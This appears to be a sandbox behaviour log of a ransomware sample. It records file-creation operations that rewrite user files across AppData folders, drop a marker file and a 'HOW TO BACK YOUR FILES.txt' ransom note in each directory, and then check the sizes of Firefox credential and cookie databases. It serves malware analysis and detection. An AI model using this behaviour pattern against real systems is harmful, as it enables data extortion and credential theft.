Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_CH\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_CH\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\all\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\all\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\Search\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\Search\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\assets\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\assets\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\IconCache.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\VirtualStore\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\VirtualStore\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\UNP\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\UNP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB.chk desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB00005.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBres00001.jrs desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBres00002.jrs desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBtmp.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\vedatamodel.edb desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\vedatamodel.jfm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\-xgy F.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\0xiOmO5gYWzu9YHVTaL.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\2oF0Av0QrLDtDkD.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\5s306805lW9yY5.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\6U1EDzYg-f9jWV81ksXS.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\8XHXvCH-33.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\9Fw4yFdueVF2 gt-.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\a1awP8HsB2PYwBF.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\BKy9YzkjWQ30.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\dQ5fctO2o1SJGoo.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\e3plLTF8rg8Bcl.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\e5htkWuyW-.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\g62RCL.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\HJlCCXK9.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\kjcfUyRTkdNG.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\ligXXA-u.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\LPFVkW.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\Mo4kmfIs.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\N99DG-cSyKfo.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\NRJRu.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\PhFbbnJJmisYmK.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\RnruXrOBs.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\t2aoDOtGdN.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\ubUCYWoEFDw-iWXBm6j.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\vY48FtNhH7zPDhB.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\X2hoDzalyI1 oZ3p1skU.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\XxveXq1B_Wj6hbxcpu_e.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\Y2Oh-tZfDsyI.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\YNX4rNLsFP9VXo9.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\z6og.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\PeerDistRepub\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\PeerDistRepub\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Packages\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Packages\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf type = size, size_out = 76 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json type = size, size_out = 24 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 type = size, size_out = 657 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml type = size, size_out = 280169 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db type = size, size_out = 65536 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json type = size, size_out = 809 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite type = size, size_out = 229376 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite type = size, size_out = 524288 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json type = size, size_out = 10542 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite type = size, size_out = 5242880 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm type = size, size_out = 32768 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal type = size, size_out = 590288 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json type = size, size_out = 683 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db type = size, size_out = 16384 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite type = size, size_out = 98304 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite type = size, size_out = 5242880 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm type = size, size_out = 32768 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal type = size, size_out = 2131512 True 1
Fn
